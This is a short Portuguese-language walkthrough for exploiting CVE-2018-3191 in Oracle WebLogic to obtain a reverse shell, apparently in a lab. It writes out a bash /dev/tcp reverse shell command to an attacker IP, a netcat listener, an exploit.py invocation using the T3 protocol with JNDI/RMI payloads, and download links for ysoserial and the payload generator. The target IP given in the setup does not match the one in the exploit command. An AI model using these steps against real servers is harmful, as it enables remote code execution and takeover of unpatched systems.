
CVE-2018-3191 shell reverso
CVE-2018-3191 Reverse Shell IP local: 172.16.38.1 Weblogic: 172.16.38.174:7001
Então execute nc -lvv 7777
(1) O comando bash acima, para evitar a interpretação de caracteres especiais durante a execução do Runtime.getRuntime().exec(), foi codificado em base64 e depois decodificado. O texto simples é: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Esta operação cria um JRMPListener local, que recebe as solicitações do Weblogic atacado e executa o comando bash reverse shell especificado. (3) O Nc escuta na porta 7777, aguardando a conexão reversa do bash do host Weblogic. 2. Execute python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, explorando a vulnerabilidade para fazer o Weblogic acessar o serviço RMI remoto e executar o comando bash reverse shell.
Ferramentas necessárias para o ataque: ysoserial-master.jar // Ferramenta de exploração de desserialização https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // Ferramenta de geração de payload CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // Ferramenta de envio do protocolo T3 do Weblogic, integrando o payload CVE-2018-3191